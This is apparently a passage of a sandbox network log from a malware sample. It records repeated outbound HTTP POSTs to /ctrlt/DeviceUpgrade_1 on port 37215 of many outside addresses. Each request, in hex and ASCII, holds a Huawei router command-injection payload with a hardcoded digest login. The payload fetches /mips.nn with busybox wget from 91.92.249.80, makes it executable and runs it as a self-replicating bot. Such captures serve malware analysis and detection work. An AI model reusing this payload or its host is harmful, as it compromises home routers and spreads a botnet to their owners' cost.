                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1329192.168.2.2355800197.113.51.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.330203056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1330192.168.2.234301085.53.219.3937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.331510067 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1331192.168.2.2359620157.107.28.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.331551075 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1332192.168.2.2338660153.123.175.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.331558943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1333192.168.2.233390841.219.141.10537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.331588030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1334192.168.2.235610441.161.203.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.332384109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1335192.168.2.2355180154.158.80.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.332637072 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1336192.168.2.2353330197.150.3.10237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.332650900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1337192.168.2.234097223.18.254.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.332693100 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1338192.168.2.2350936157.183.10.15537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.332710028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
